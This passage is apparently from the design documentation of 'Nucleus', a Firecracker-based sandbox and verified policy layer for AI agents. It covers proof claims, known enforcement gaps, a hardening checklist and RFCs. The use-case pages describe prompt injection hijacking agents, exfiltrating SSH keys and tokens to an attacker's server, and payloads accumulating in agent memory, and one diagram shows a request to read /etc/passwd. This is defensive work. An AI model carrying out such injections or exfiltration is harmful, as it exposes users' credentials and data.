What it does NOT prove: That the 13 capability dimensions are the right ones for your use case. The algebra is generic; the dimensions are application-specific.

CI gate: Kani in Mutation Testing job. Lean type generation in Aeneas job.

Tier 2: Structural Safety (Rust Type System)

6. Obligation bypass is a type error

Plain English: There is no way to execute a side effect (file write, web fetch, shell command) through NucleusRuntime without first passing the obligation discharge check. The DischargedBundle required by effect functions can only be obtained from a successful preflight_action() call — its constructor is private.

Structural enforcement: DischargedBundle contains a private Seal field that cannot be named outside its module. Discharged<O> tokens are zero-sized proof witnesses; Discharged::mint() is fn (not pub fn).

Proved in: Compile-fail doc-test on DischargedBundle (portcullis-core/src/discharge.rs)

What it does NOT prove: That the obligation checks themselves are correct. Only that they cannot be skipped. The checks’ correctness is tested by 33 unit tests and the Kani harnesses above.

CI gate: Tests job runs the compile-fail doc-test. A PR that makes the Seal field public or adds a public constructor would fail the doc-test.

7. Confidentiality downflow is enforced

Plain English: Data classified as Secret cannot flow to a sink classified as Public or Internal through NucleusRuntime. The session-level confidentiality ceiling prevents laundering through clean intermediaries: if the session has ever observed Secret data, writing to any non-Secret sink is blocked.

Structural enforcement:

FlowTracker::session_conf_ceiling is monotonically non-decreasing
check_exfiltration_safety() checks both node-level and session-level conf
At the type level, Labeled<T, I, Secret> does not implement ConfAtMost<Public>, so passing secret data to a public-gated function is a compile error

Proved in: 21 unit tests in ifc_api::tests + compile-fail doc-test on Labeled

What it does NOT prove: That all data sources are labeled with the correct confidentiality. Mislabeled data bypasses the check. Source labeling is the integrator’s responsibility.

CI gate: Tests job.

8. Type-level IFC prevents tainted-to-trusted flow

Plain English: A function that requires Trusted-integrity input will not compile if passed Adversarial-integrity data. This catches the most common IFC violation — using web-scraped content in a privileged operation — at compile time rather than at runtime.

Structural enforcement: Labeled<T, Adversarial, C> does not implement IntegAtLeast<Trusted>. The only way to promote Adversarial to Untrusted is promote_integrity() which requires an explicit DeclassifyReason. The only way to promote Untrusted to Trusted is promote_to_trusted() which accepts only HumanReview or DeterministicVerification — Sanitization alone is rejected.

Proved in: Compile-fail doc-test on Labeled + 22 unit tests in labeled::tests

What it does NOT prove: That runtime IFC checks are redundant. The type-level system is an approximation — dynamic data flow through the FlowTracker remains necessary for paths where the type is erased.

CI gate: Tests job.

9. OIDC→SPIFFE charset is enforced — and the derivation is NOT collision-free

Plain English: When a GitHub Actions OIDC token is mapped to a Nucleus SPIFFE id, every path segment is sanitized to the SPIFFE-legal charset [A-Za-z0-9._-]. We machine-check that the extracted-from-Rust byte classifier admits exactly that charset. We ALSO machine-check the honest negative result: because sanitization is lossy, the derivation is not injective — distinct OIDC claim-sets can mint the same SPIFFE id within one owner/repo. That collision is a real authz-confusion surface and is documented, not hidden.

Formal statement (proven, sorry-free, over the Aeneas-extracted defs):

is_spiffe_byte_iff / is_spiffe_byte_charset — for every U8 byte, the generated is_spiffe_byte returns ok true iff the byte is in [0-9A-Za-z._-] (exhaustive over all 256 values).
collapse_lossy_step — the generated per-byte sanitizer step maps the DISALLOWED byte / (0x2F) and the ALLOWED byte - (0x2D), from the same state, to the IDENTICAL continuation. This is the merge that destroys injectivity.

The collision finding (pinned, NOT a proven safety property): "a/b" and "a-b" both sanitize to "a-b"; "refs/heads/x" and "refs-heads-x" both → "refs-heads-x". So two distinct refs/repos can derive the same SPIFFE id. We do not claim SPIFFE ids are collision-free — the opposite is true and pinned as a regression test.

Trust chain: production sanitize_segment / derive_spiffe_id (claims.rs) ≡ the byte-indexed extracted/oidc_spiffe.rs mirror (proven byte-identical across random Unicode by the parity proptests) → Lean via Aeneas.

Proved in:

Lean 4: lean/OidcSpiffeProofs.lean — is_spiffe_byte_iff, is_spiffe_byte_charset, collapse_lossy_step (each #print axioms = [propext, Classical.choice, Quot.sound])
Rust parity + collision proptests: src/extracted/oidc_spiffe.rs — sanitize_bytes_matches_production, derive_spiffe_bytes_matches_production, is_spiffe_byte_matches_production_charset, collision_distinct_refs_same_spiffe_id, collision_distinct_repo_segments

What it does NOT prove:

NOT that SPIFFE ids are collision-free (they are not — see the finding).
NOT “no -- run” in output (production does not guarantee it; a literal - next to a collapsed dash yields --).
The full end-to-end sanitize_bytes(x) = sanitize_bytes(y) collision is proven in the Rust proptest, not yet as a closed Lean theorem: Aeneas’s loop combinator (partial_fixpoint) does not reduce under simp/decide, so the Lean side proves the per-step root cause (collapse_lossy_step) rather than evaluating the whole loop. This gap is disclosed, not papered over with a sorry.
The owner-binding guard (repository_owner == org(repository)) and the final CallSpiffeId::parse are equality / parser checks outside the extracted rendered-bytes subgraph.

Why the collision is acceptable in context: authorization is decided on the verified claim (the allow-listed repository_owner / repository), not on the rendered SPIFFE id. The SPIFFE id is a downstream identifier. The finding bounds where the lossy id may NOT be used as a sole authz key.

CI gate: Aeneas OIDC→SPIFFE (scoped extraction + derivation properties) job — scoped Charon→Aeneas extraction, Rust parity+collision tests, Lean build, and the Assert clean axiom set / Reject sorry audits. Blocks merge.

What happens when a proof breaks

The Aeneas (Rust -> Lean 4) or Mutation Testing CI job fails
The merge queue rejects the PR
The PR author sees the specific theorem that failed and the Lean/Kani error
The Constitutional Gate (external webhook) logs the failure for audit

No code that breaks a verified claim can reach main.

Known Gaps

The claims above hold for code paths that go through PolicyEnforced or NucleusRuntime. The following gaps mean they do not hold universally:

Enforcement completeness (#1216)

146 call sites in nucleus-claude-hook and nucleus-mcp call std::fs, std::process::Command, and reqwest directly, bypassing the PolicyEnforced effect layer. The effect layer exists and is verified, but is not structurally required at every I/O site. Migration is tracked in #1216.

Impact: An operation routed through these 146 call sites gets capability checking via Kernel::decide_term() (which runs obligation discharge), but does NOT get the PolicyEnforced effect wrapper. A bug in the call site code could perform I/O without any policy gate.

NucleusRuntime escape hatch (#1248)

NucleusRuntime::effects() returns a raw PolicyEnforced bundle that checks capabilities but does NOT run obligation discharge or update the FlowTracker. The mediated methods (read_file, write_file, etc.) compose all three layers. A developer who discovers .effects() first uses the weaker path.

Type-level IFC not composed into runtime (#1249)

NucleusRuntime::read_file() returns Vec<u8>, not Labeled<Vec<u8>, Trusted, Internal>. The compile-time IFC layer (Labeled<T, I, C>) and the runtime IFC layer (FlowTracker) are independently correct but not composed at the API boundary. Agents using NucleusRuntime get runtime tracking but not compile-time enforcement of IFC constraints.

Verification coverage summary

Layer	Tool	Harnesses	Scope
IFC semilattice	Lean 4	19 theorems	Label algebra, join/meet laws, absorption
Derivation monotonicity	Lean 4	9 theorems	Taint propagation, no-cleansing
Capability Heyting algebra	Kani BMC	26 harnesses	Meet/join/implies, adjunction
Kernel invariants	Kani BMC	133 harnesses	Exposure, delegation, guards, flow
Discharge sealing	Rust types	1 compile-fail test	No forging of `DischargedBundle`
Type-level IFC	Rust types	1 compile-fail test	No `Adversarial` -> `Trusted` flow
Confidentiality downflow	Unit tests	21 tests	No `Secret` -> `Public` flow

Hardening Checklist (Demo Readiness)

This checklist defines pass/fail criteria for calling the demo “fully hardened,” including the goal of a static envelope around a dynamic agent. Each item includes a current status and evidence pointer.

Status key: DONE, PARTIAL, TODO.

1) Enforcement Path (Policy -> Physics)

All side effects go through nucleus-tool-proxy
- Pass: CLI/tool adapters can only execute file/command/network ops via the proxy API.
- Current: DONE (CLI uses node + MCP; no unsafe direct mode).
- Evidence: crates/nucleus-cli/src/run.rs
CLI hard-fail if not enforced
- Pass: No unsafe flags; enforced mode is the default path.
- Current: DONE (unsafe flag removed).
- Evidence: crates/nucleus-cli/src/run.rs
Node API requires signed requests
- Pass: nucleus-node rejects unsigned HTTP/gRPC calls.
- Current: DONE (auth secret required).
- Evidence: crates/nucleus-node/src/main.rs, crates/nucleus-node/src/auth.rs

2) Network Egress Control

Default-deny enforced for Firecracker pods
- Pass: netns iptables default DROP even without spec.network.
- Current: DONE.
- Evidence: crates/nucleus-node/src/main.rs, crates/nucleus-node/src/net.rs
IPv6 is denied or disabled
- Pass: ip6tables mirrors default-deny OR guest IPv6 is disabled.
- Current: DONE (guest IPv6 disabled at boot).
- Evidence: crates/nucleus-node/src/main.rs
DNS allowlisting
- Pass: explicit hostname allowlist enforced (ipset/dnsmasq or equivalent).
- Current: DONE (dnsmasq proxy with pinned hostname resolution).
- Evidence: crates/nucleus-node/src/net.rs, crates/nucleus-spec/src/lib.rs

3) Approvals (AskFirst)

Approvals are cryptographically signed
- Pass: approvals require signed tokens with nonce + expiry, verified in proxy.
- Current: DONE (approval secret required; nonce + expiry enforced).
- Evidence: crates/nucleus-tool-proxy/src/main.rs
Approval replay protection
- Pass: nonce cache + expiry enforced for all approvals.
- Current: DONE (nonce required for approvals).
- Evidence: crates/nucleus-tool-proxy/src/main.rs

4) Isolation (VM Boundary)

Rootfs is read-only
- Pass: image configured read-only; scratch is explicit and limited.
- Current: DONE (when image spec requests it).
- Evidence: scripts/firecracker/build-rootfs.sh, crates/nucleus-node/src/main.rs
Guest has no extra services
- Pass: init runs tool-proxy only.
- Current: DONE.
- Evidence: crates/nucleus-guest-init/src/main.rs
Seccomp enforced
- Pass: seccomp profile configured and verified post-spawn.
- Current: DONE (config applied via apply_seccomp_flags; post-spawn /proc/{pid}/status verification checks mode=2).
- Evidence: crates/nucleus-node/src/main.rs (verify_seccomp_active, apply_seccomp_flags), crates/nucleus-spec/src/lib.rs (SeccompSpec)

4.5) Monotone Security Posture (Immutability)

No privilege relaxation after creation
- Pass: permission state can only tighten or the pod is terminated.
- Current: DONE (Lean 4 + Kani-proven E1-E3 enforcement boundary + runtime debug_assert).
- Evidence: crates/portcullis/src/kani.rs (E1: exposure monotonicity, E2: trace monotonicity, E3: denial monotonicity), crates/portcullis-core/lean/ (Lean theorems), crates/portcullis/src/guard.rs (debug_assert in execute_and_record)
Network policy drift detection
- Pass: host checks iptables drift and fails closed on deviation.
- Current: DONE.
- Evidence: crates/nucleus-node/src/net.rs, crates/nucleus-node/src/main.rs
Seccomp immutability documented
- Pass: docs explicitly state seccomp is fixed at Firecracker spawn.
- Current: DONE.
- Evidence: docs/architecture/overview.md, README.md

5) Audit + Integrity

Audit log signatures
- Pass: log entries are signed; verification tool exists.
- Current: DONE (signatures enforced; verifier available).
- Evidence: crates/nucleus-tool-proxy/src/main.rs, crates/nucleus-audit/src/main.rs
Remote append-only storage
- Pass: logs shipped to append-only store (or immutability proof).
- Current: DONE (S3AuditBackend with if_none_match("*") append-only semantics; behind remote-audit feature flag).
- Evidence: crates/portcullis/src/s3_audit_backend.rs, crates/nucleus-spec/src/lib.rs (AuditSinkSpec)

6) Formal Assurance Gates

ν laws proven in CI
- Pass: Lean/Kani proof jobs run in CI and block merges on failure.
- Current: DONE (113 Kani harnesses + ~277 Lean 4 theorems; both gated on main — Kani via count-regression per-PR + full nightly, Lean via sorry-rejection on the Aeneas-bridged core).
- Evidence: .github/workflows/kani-nightly.yml, .github/workflows/lean-build.yml, .github/workflows/aeneas-ifc-scoped.yml, crates/portcullis/src/kani.rs, crates/portcullis-core/lean/
Fuzzing in CI
- Pass: cargo-fuzz targets run with time budget; known bypasses blocked.
- Current: DONE (3 fuzz targets × 30s; Fuzz is a required merge check on main).
- Evidence: fuzz/, .github/workflows/ci.yml

6.5) Web Ingress Control

MIME type gating on web_fetch
- Pass: only text and structured data MIME types are allowed; binary formats blocked.
- Current: DONE (allowlist: text/*, application/json, application/xml, etc.).
- Evidence: crates/nucleus-tool-proxy/src/main.rs (web_fetch handler)
Exposure provenance on fetched content
- Pass: all web-fetched content is tagged with X-Nucleus-Exposure: UntrustedContent + source domain.
- Current: DONE.
- Evidence: crates/nucleus-tool-proxy/src/main.rs (response headers)
URL pattern allowlisting
- Pass: per-pod URL pattern allowlist via NetworkSpec.url_allow.
- Current: DONE (glob-style matching; empty = allow all permitted domains).
- Evidence: crates/nucleus-spec/src/lib.rs (NetworkSpec), crates/nucleus-tool-proxy/src/main.rs

7) Demo Verification Script

Network policy test
- Pass: scripts/firecracker/test-network.sh passes with allow/deny.
- Current: DONE (manual).
- Evidence: scripts/firecracker/test-network.sh

Exit Criteria (Full Hardened Demo)

All items above at DONE, and:

Enforced CLI path is the default.
IPv6 + DNS allowlisting are covered.
Signed approvals + audit verification are implemented.
CI gates (Kani + fuzz + integration tests) are in place.

RFC: Agent Control Plane on Fly Machines

Status: Draft / exploratory. Describes a target architecture; not yet implemented. The substrate primitive it relies on (Firecracker VM snapshot/restore) is provided by Fly’s suspend/start — we do not build it.

Thesis

Fly Machines are Firecracker microVMs, exposed through a REST API with suspend (memory snapshot) / start (restore) and scale-to-zero. So we do not build the node / runtime / snapshot / scale-to-zero layer — we build the agent-specific control plane (scheduler, budget, information-flow + provenance, verified policy) and drive Fly’s Machines API. Fly is the substrate; nucleus + the orchestrator are the brains.

Crucially, Fly’s suspend is the “freeze an idle agent to ~$0, thaw in ~ms on the next message” primitive — the single feature that is both a large efficiency win for bursty agent workloads and structurally impossible on Kubernetes (a paused pod still reserves resources; CRIU is fragile). We get it out of the box.

Responsibility split

Concern	Fly provides	We build
microVM isolation	Machines = Firecracker	—
Freeze / resume	`suspend` (mem snapshot) / `start`	when to suspend (session semantics)
Scale-to-zero	`auto_stop/start`, `min_machines=0`	per-session (not per-app) policy
Boot / placement / regions	Machines API, global	which region per session (affinity)
Networking	6PN, Flycast, egress	data-flow policy (IFC), default-deny intent
Identity token	Machine OIDC token	`nucleus-fly-oidc` → SPIFFE SVID
Compute billing	machine-seconds usage	token / $ budget (CostStore)
Scheduler	(places machines you ask for)	matchmaker / VCG, work queue, reconciler
Policy / admission	—	portcullis kernel (Lean/Kani), IFC, Cedar
Provenance	—	`nucleus-lineage` signed DAG

Session → Machine lifecycle

submit work ─► admit (budget pre-flight) ─► create Machine (or clone warm snapshot) ─► ACTIVE
ACTIVE ─(idle N s / awaiting human)──────► suspend       ─► FROZEN   (~$0 compute)
FROZEN ─(inbound message)────────────────► start         ─► ACTIVE   (mem-restore, ~ms)
ACTIVE ─(budget exhausted / done)────────► stop/destroy  ─► TERMINAL (+ volume GC)
crash / host evict ──────────────────────► reconciler restores from last suspend / volume checkpoint

Our reconciler owns this state machine; the transitions are Machines API calls.

Suspend-on-idle / resume-on-message (the efficiency core)

Idle detector (per session) → suspend when a session is waiting on a human or quiescent. Compute meter → 0; pay only suspended-memory storage.
Resume router: inbound message → if the session’s Machine is FROZEN, start it then forward. Fly’s request-based auto_start covers app-level; for per-session control we call the API explicitly (or via fly-replay).
Tiering: after a long freeze (or near Fly’s max-suspend limit), demote suspend → full stop + a volume/lineage checkpoint — lower storage cost and no dependence on suspend-duration limits.

Budget enforcement via the Machines API

Fly meters machine-seconds; we meter tokens/$ in-band and combine both in the CostStore. Three enforcement points:

Pre-flight admission — don’t create/start a Machine if the session/tenant budget is exhausted.
In-session circuit breaker — the tool-proxy / portcullis kernel denies tool calls at the budget ceiling → triggers suspend (pause spend) or destroy.
Idle → suspend — the cheapest lever: stop the compute meter the instant a session goes quiet.

Identity: SPIFFE via fly-oidc (no long-lived secrets)

Machine boots → fetches its Fly Machine OIDC token → presents it to the control plane → nucleus-fly-oidc validates it against Fly’s JWKS and derives a SPIFFE id from the verified machine/app claims → issues a scoped SVID + a portcullis capability cert (delegation-ceiling’d). That SVID backs mTLS to the tool-proxy / control plane and signs every lineage edge. (nucleus-fly-oidc is the validation half today; this is its production consumer.)

Fly call vs ours (cheat sheet)

Fly API: machines.create / start / suspend / stop / destroy / wait, volumes, OIDC token fetch, 6PN / Flycast.
Ours (never Fly): the scheduler / queue, the budget meter + circuit breakers, IFC FlowTracker + Cedar/portcullis decisions, lineage/provenance, SPIFFE issuance, and the session↔Machine state machine.

Avoiding lock-in

Keep execution behind a MachineDriver trait: Fly is one implementation (FlyMachineDriver), raw-Firecracker / nucleus-node another, an in-memory MockMachineDriver for tests. The reconciler depends only on the trait.

Open risks (verify before committing)

Suspend limits (max duration, machine size, GPU), resume latency for large RAM, suspended-memory storage cost, per-session vs per-app auto_start semantics, Machines API rate limits, multi-region session affinity, and Fly lock-in (mitigated by the MachineDriver abstraction).

Phasing

P0: single region; reconciler drives create/suspend/start/destroy per session; budget pre-flight + idle-suspend; SPIFFE via fly-oidc.
P1: resume-on-message router; in-session budget circuit breaker; per-session lineage.
P2: warm-pool + clone-from-snapshot; multi-region affinity; spot-style eviction → restore.

P0 is mostly wiring an existing reconciler to the Fly Machines API + budget pre-flight + fly-oidc SVID issuance. The hard primitive (snapshot freeze/resume) is Fly’s suspend.

RFC: Verified Agent Commerce — a drop-in trust + receipt layer for x402 / A2A

Status: Implemented (v1) — GTM exploratory. The seller-side library now ships as crates/nucleus-verify-commerce (real Agent-Card verification, signed nucleus-envelope receipts, verify_receipt_bundle, an x402 X-PAYMENT helper, and a runnable quickstart example). It composes existing crates (nucleus-agent-card, nucleus-envelope, nucleus-verifier-service, nucleus-fly-oidc / nucleus-github-oidc, portcullis); no new payment rail is built — x402 stays x402. The GTM motion (packaging, design partner) is the exploratory part.

Thesis

The agent-payments rail is solved and commoditized. x402 (Linux Foundation, 100M+ agentic txns, ~$600M annualized) plus Google/Coinbase’s A2A x402 extension and AP2 already let an agent discover, authorize, and pay another agent. Coinbase, Stripe, AWS (Bedrock AgentCore Payments), and Vercel (x402-mcp) all ship free tooling to wire it up.

So we do not build a bridge — the bridge exists and is given away by the incumbents. The open, loudly-documented problem one layer up is trust:

a seller “cannot rely on its own telemetry to verify the buyer… forced to trust a software agent it did not build and cannot inspect”;
“merchant verification at scale is unsolved”;
fraud now looks like clean, fast, successful transactions, so sellers eat “hallucination disputes” and chargebacks.

Industry is converging on verify-then-pay. That is exactly what nucleus’s existing verifiable core provides. This RFC packages it as a 30-minute drop-in for micro-SaaS sellers on x402/A2A.

Scope

A seller-side library + QuickStart that, around an existing x402-paid endpoint, adds two things the payment rail does not:

Verify the caller before serving — check the calling agent’s signed identity (Agent Card / OIDC→SPIFFE) and policy bounds.
Return a portable receipt after serving — a provenance bundle proving what was delivered for what payment, independently verifiable and logged to a transparency log, so a buyer can verify-then-settle and a seller has a dispute-defense artifact.

Out of scope: the payment itself (x402 facilitator), custody, any new token, buyer-side wallet UX.

Flow

  paying agent ──HTTP 402 / x402──▶  micro-SaaS endpoint
                                       │
                 ┌─────────────────────┴───────────────────────┐
                 │  nucleus verify-commerce middleware          │
                 │                                              │
                 │  (1) verify caller identity                  │
                 │      Agent Card (JWS) / OIDC→SPIFFE          │  ← nucleus-agent-card
                 │      + portcullis policy / spend bounds      │    nucleus-*-oidc, portcullis
                 │                                              │
                 │  (2) serve the paid work                     │
                 │                                              │
                 │  (3) emit a provenance receipt               │  ← nucleus-envelope
                 │      → transparency log + return to caller   │    nucleus-verifier-service
                 └──────────────────────────────────────────────┘
                                       │
            buyer independently verifies the receipt (verify-then-settle / dispute)

The receipt is the wedge: it is the artifact that survives the disappearance of traditional fraud signals.

Crate mapping (all already shipped)

Capability	Crate
Verify-before-you-act agent identity	`nucleus-agent-card`
Federated workload identity → SPIFFE	`nucleus-fly-oidc`, `nucleus-github-oidc`, `nucleus-oidc-core`
Policy / capability / spend bounds	`portcullis`, `portcullis-effects`, `nucleus-permission-market`
Portable provenance receipt	`nucleus-envelope`
Transparency log + public verifier	`nucleus-verifier-service`
Browser/WASM independent verification	`@coproduct/verify` (verify pkg)

The net-new work is packaging + an adapter, not new primitives: an x402/A2A request adapter, a thin seller middleware, and a QuickStart.

QuickStart shape (the GTM artifact)

“Add verified agent commerce to your x402 API in 30 minutes.”

nucleus verify-commerce init — generate a seller signing key + Agent Card.
Wrap the existing paid handler in the middleware (identity check in, receipt out). One import, one wrapper.
The caller receives a receipt; anyone can verify it with @coproduct/verify or the public verifier service.

Mirrors Coinbase’s “30-minute” payment QuickStart, but for the trust layer the payment QuickStart omits.

Differentiation (be honest about the crowd)

Visa “Verifiable Intent”, Mastercard, Signifyd, TessPay, Crossmint, and Nevermined are all circling agentic-commerce trust. The only durable differentiator is the one nobody else has: formal verification + portable, independently-verifiable provenance receipts (sorry-free proofs, transparency log) rather than a proprietary trust score. Lead with verifiable, not trusted.

Open questions / honesty

Demand is the bottleneck, not the substrate. A QuickStart lowers integration friction; it does not by itself create a forcing function. Target the one pain a seller will pay to avoid: liability for hallucination disputes / chargebacks. Make the receipt the dispute-defense artifact.
Keep the verify path OSS, free, near-zero-friction. Sellers get payments free; they will only adopt a trust layer if it costs them almost nothing to add. Monetize the federation / registry / compliance control plane (the existing open-core split), not the verify call.
AP2 already has cryptographic mandates (authorization). We do not duplicate authorization — we add counterparty verification and delivery receipts, which AP2/x402 leave to the participants.
Validate with one design partner before building the polished QuickStart. A micro-SaaS seller already on (or adopting) x402 who has felt a dispute.

Implementation note: what the receipt actually signs

The first cut (crates/nucleus-verify-commerce) surfaced a real subtlety worth recording: nucleus_lineage::canonical_edge_bytes signs a lineage edge’s child, kind, parents, content_hash_hex, ts, and prev_hash — but not the edge’s free-form attrs nor the bundle’s payload. So putting the commerce binding only in the payload would be a false guarantee (the bundle would still “verify” after the payload was tampered). The receipt issuer instead folds the whole binding (resource + caller + payment + body hash) into the delivery edge’s content hash, which is signed; verify_receipt_bundle re-derives the binding from the payload and checks it equals that signed hash. Tampering any field is then detected (regression-tested). This is the kind of guarantee that has to be checked, not assumed.

Recommendation

Greenlight the QuickStart as a GTM experiment; drop the “bridge” framing. The metric to watch is the same as the broader plan: one paid (or actively integrating) design partner in 30 days. Reuse shipped crates; the net-new surface is an adapter + middleware + docs.

RFC: Signed, IFC-Attested, Receipt-Bearing Agents

Status: Implementing (v1). Layer 1 (the signed card profile) ships in nucleus-agent-card (PR #1735); the just agent-sign flow follows. Layers 2–3 (receipt↔rule binding, runtime enforcement loading) are proposed. Composes existing crates: nucleus-agent-card, nucleus-ifc, nucleus-verify-commerce, nucleus-envelope, nucleus-verifier-service, the nucleus-*-oidc keyless path.

Thesis

An agent should ship with a signed card that declares the runtime information-flow guarantee it enforces, so a counterparty can verify that guarantee — client-side, offline — instead of taking the host’s word for it. The field is racing toward signed identity + provenance (Sigstore A2A, Agent Passport / Agent-VC) and hardware-rooted runtime attestation (EQTY, Windows TPM). The white space is a portable, counterparty-checkable proof of a semantic guarantee like IFC/non-interference. Nucleus already has every piece: a signed agent card, the IFC gate (serve_verified_ifc, #1733), independently-verifiable envelope receipts, OIDC keyless signing, and a transparency log.

The attestation stack

Layer 1 — declare (this RFC, shipped). An optional RuntimeGuaranteeProfile on AgentCard (profile_version, tracked_sources, enforcement_rules, advisory attestation_reference). Because it is part of the card’s JCS-canonical bytes, the existing ES256 card signature covers it — the declaration is authentic and tamper-evident (tampering_runtime_guarantees_breaks_signature).

Layer 2 — bind receipts to the declared rules (proposed). Each nucleus-envelope receipt already folds its decision into a signed content hash (the lesson from nucleus-verify-commerce: payload/attrs are not signed, content hash is). Extend the receipt binding to include the rule identity (enforcement_rules[i].name + a hash of the rule) so a verifier can confirm a verdict came from evaluating this card’s declared rule, not some unrelated host policy.

Layer 3 — load + enforce the declared profile (proposed). At session start the runtime loads the signed card’s tracked_sources / enforcement_rules into the nucleus-ifc FlowDeclaration path and fails closed. This is the only layer that prevents (vs. detects) violations, and it is host-side.

`just agent-sign` / `agent-ship` (next PR)

just agent-sign     # OIDC-keyless-sign an A2A v1.0 card (incl. its runtime-guarantee claims), → signed AgentCard
just agent-ship     # publish the signed card to /.well-known + the transparency log

Keyless signing reuses the existing path: a CI or workload OIDC token (nucleus-github-oidc / nucleus-fly-oidc) → SPIFFE id → ES256 signature over JCS(card). No new secret material.

What a verified profile proves — and does not

Proven	Not proven
Authenticity — the agent issued this exact card (ES256 over JCS)	Policy correctness — the declared rules are sound/sufficient (IFC is necessary, not sufficient)
Integrity — the profile wasn’t altered post-signing	Enforcement — the host actually applies the rules (Layer 3)
Rule provenance (Layer 2) — a receipt’s verdict came from a declared rule	Good decisions — IFC tracks data lineage, not hallucination/jailbreak
Chain integrity — the receipt sequence is complete + ordered	Host honesty — software signing ≠ hardware attestation; key theft possible

The core honesty line: the client verifies the attested declaration + the receipts; it does not enforce the seller’s runtime. Enforcement is host-side, model-level, and coverage-limited (an undeclared input is one the lattice never sees; the gate is per-call, no cross-call taint ratchet). Lead with verifiable, never guaranteed-safe.

Microsoft ACS interop

Reference, don’t reinvent. The attestation_reference field can carry a Microsoft Agent Control Specification policy id; nucleus is then the verifiable enforcement + receipt layer for an ACS-described policy. The mapping is lossy and one-way (nucleus’s finer-grained IFC labels → ACS’s coarser intervention points), and the reference is advisory — a verifier with no out-of-band knowledge of the ACS policy cannot confirm it.

Backward compatibility

runtime_guarantees is Option<…> with skip_serializing_if: omitted from JSON when absent, so old cards (no field) and new cards both verify, and the existing signature path is unchanged. (PR #1735.)

Open questions

Layer 2 receipt↔rule binding: exact canonical form of the rule hash.
Revocation: receipts are immutable; clients detect a stale card only on re-verification — there is no server-side retroactive invalidation.
A standard vocabulary for enforcement_rules[].name (so different agents’ declarations are comparable), vs. free-form strings.

Recommendation

Ship Layer 1 + just agent-sign now (verifiable declaration is useful on its own and is the demo wedge). Sequence Layers 2–3 behind it. Keep the honesty table attached to every external description of this feature.

Nucleus Use Cases

Nucleus provides hardware-isolated sandboxing for AI agents. While the architecture is general-purpose, certain use cases benefit most from defense-in-depth isolation.

Why Now

January 2026 brought AI agent security into sharp focus:

Moltbook breach (Jan 31): Unsecured database allowed hijacking of 770K+ AI agents
Palo Alto “Uninhabitable State” research: Identified the dangerous combination of private data access + untrusted content + external communication
OpenClaw adoption: 100K+ GitHub stars, running in enterprise environments with root filesystem access

The industry is deploying agents faster than security practices can evolve. Nucleus provides a hardened execution layer that doesn’t require perfect configuration—isolation is architectural, not optional.

Use Cases

Use Case	Risk Profile	Nucleus Benefit
OpenClaw Hardening	Critical - full system access	Break the uninhabitable state
Claude Code Sandbox	High - code execution	Isolated tool execution
MCP Server Isolation	Medium - tool calls	Per-tool sandboxing
Enterprise AI Agents	Variable - compliance	Audit trails, NIST compliance

Quick Comparison

┌─────────────────────────────────────────────────────────────────┐
│                     Without Nucleus                              │
├─────────────────────────────────────────────────────────────────┤
│  AI Agent ──► Tools ──► Host Filesystem ──► Network ──► World   │
│     │                        │                                   │
│     └── Credentials, API keys, browser sessions all accessible  │
└─────────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────────┐
│                      With Nucleus                                │
├─────────────────────────────────────────────────────────────────┤
│  AI Agent (host) ──► nucleus-node ──► Firecracker VM            │
│       │                                    │                     │
│       │  API keys stay here          Only /workspace visible     │
│       │                              Network egress filtered     │
│       │                              No shell escape possible    │
│       │                                    │                     │
│       └────────── Signed results ◄─────────┘                    │
└─────────────────────────────────────────────────────────────────┘

Getting Started

# Install
cargo install nucleus-node
cargo install nucleus-cli

# Setup (macOS with Lima VM, or native Linux)
nucleus setup

# Verify
nucleus doctor

See individual use case docs for integration guides.

Hardening OpenClaw with Nucleus

“There is no ‘perfectly secure’ setup.” — OpenClaw Security Documentation

We disagree. Security should be architectural, not aspirational.

Status Update: February 2026

OpenAI acquired OpenClaw on February 14, 2026. The project’s future licensing and API stability are uncertain. Nucleus’s value proposition is framework-agnostic isolation — it works with OpenClaw, but also with any agent framework that executes tools (Claude Code, Cursor, Windsurf, custom agents, etc.). If OpenClaw becomes closed-source or OpenAI-proprietary, nucleus remains unaffected.

The Problem: January 2026

OpenClaw (formerly Moltbot/Clawdbot) has become one of the fastest-growing open source projects in history—100K+ GitHub stars in two months. It’s deployed in enterprise environments, managing calendars, sending messages, and automating workflows.

It also requires:

Root filesystem access
Stored credentials and API keys
Browser sessions with authenticated cookies
Unrestricted network access

On January 31, 2026, the Moltbook social network for AI agents suffered a critical breach. An unsecured database allowed anyone to hijack any of the 770,000+ agents on the platform, injecting commands directly into their sessions.

This wasn’t a sophisticated attack. It was a configuration oversight in a system designed to be “configured correctly by the operator.”

The Uninhabitable State

Palo Alto Networks identified why OpenClaw’s architecture is fundamentally dangerous:

Element	Why It’s Dangerous	OpenClaw Default
Private data access	Agent can read credentials, keys, PII	Full filesystem access
Untrusted content	Prompt injection via web, attachments	Processed on host
External communication	Exfiltration channel	Unrestricted outbound

When all three combine, a single prompt injection can exfiltrate your SSH keys, API tokens, or browser sessions to an attacker-controlled server.

The Fourth Risk: Persistent Memory

OpenClaw’s memory system compounds the danger. Malicious payloads don’t need immediate execution—fragments can accumulate across sessions and combine later. By the time the attack triggers, the injection point is buried in conversation history.

How Nucleus Breaks the Uninhabitable state

Nucleus interposes a Firecracker microVM between the AI agent and tool execution:

┌─────────────────────────────────────────────────────────────────┐
│  OpenClaw Gateway (Host)                                        │
│  ├── Claude/GPT API credentials    ← Never enter sandbox        │
│  ├── User's browser sessions       ← Never enter sandbox        │
│  └── ~/.openclaw/credentials/      ← Never enter sandbox        │
│                                                                  │
│  Tool Request: "read file /etc/passwd"                          │
│         │                                                        │
│         ▼                                                        │
│  ┌─────────────────────────────────────────────────────────────┐│
│  │  nucleus-node                                                ││
│  │  ├── HMAC-SHA256 signature verification                     ││
│  │  ├── Lattice-guard permission check                         ││
│  │  └── Approval token validation                              ││
│  └─────────────────────────────────────────────────────────────┘│
│         │                                                        │
│         ▼                                                        │
│  ┌─────────────────────────────────────────────────────────────┐│
│  │  Firecracker microVM (isolated)                             ││
│  │  ├── Sees only /workspace (mapped directory)                ││
│  │  ├── No access to host filesystem                           ││
│  │  ├── Network namespace: egress allowlist only               ││
│  │  └── Read-only rootfs, ephemeral scratch                    ││
│  └─────────────────────────────────────────────────────────────┘│
│         │                                                        │
│         ▼                                                        │
│  Result: "Permission denied" or sandboxed file contents          │
└─────────────────────────────────────────────────────────────────┘

Uninhabitable state Mitigation

Uninhabitable state Element	Nucleus Mitigation
Private data access	VM sees only `/workspace`, not host filesystem
Untrusted content	Processed inside VM, cannot escape to host
External communication	Network namespace with egress allowlist
